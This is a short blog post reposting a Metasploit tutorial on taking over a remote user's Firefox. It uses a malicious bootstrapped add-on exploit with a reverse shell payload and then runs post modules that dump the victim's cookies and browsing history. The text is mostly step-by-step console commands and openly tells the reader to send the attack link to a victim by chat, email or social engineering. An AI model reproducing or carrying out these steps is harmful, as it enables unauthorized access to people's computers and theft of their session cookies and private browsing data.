lunes, 26 de enero de 2015

Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit  
Now an URL you should give to your victim http://192.168.1.9:8080/
Send the link of the server to the victim via chat or email or any social engineering technique. Now you have access to the victims PC
Once we have the shell, we simply run the post module to dump the credentials to a file
How to Gather History
Now type use post/firefox/gather/history
msf exploit (history) set payload firefox/shell_reverse_tcp
msf exploit (history)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (history)>set session 1
msf exploit (history)>exploit
Result will stored on your local computer
/root/.msf4/loot/
A look at the result, you will see data like

How to Gather Cookies
Once we have the shell, we simply run the post module to dump the credentials to a file
Now type use post/firefox/gather/cookies
msf exploit (cookies) set payload firefox/shell_reverse_tcp
msf exploit (cookies)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (cookies)>set session 1
msf exploit (cookies)>exploit

Result will stored on your local computer
/root/.msf4/loot/


Fuente: http://www.hackingarticles.in/gather-cookies-and-history-of-mozilla-firefox-in-remote-windows-linux-or-mac-pc/

No hay comentarios:

Publicar un comentario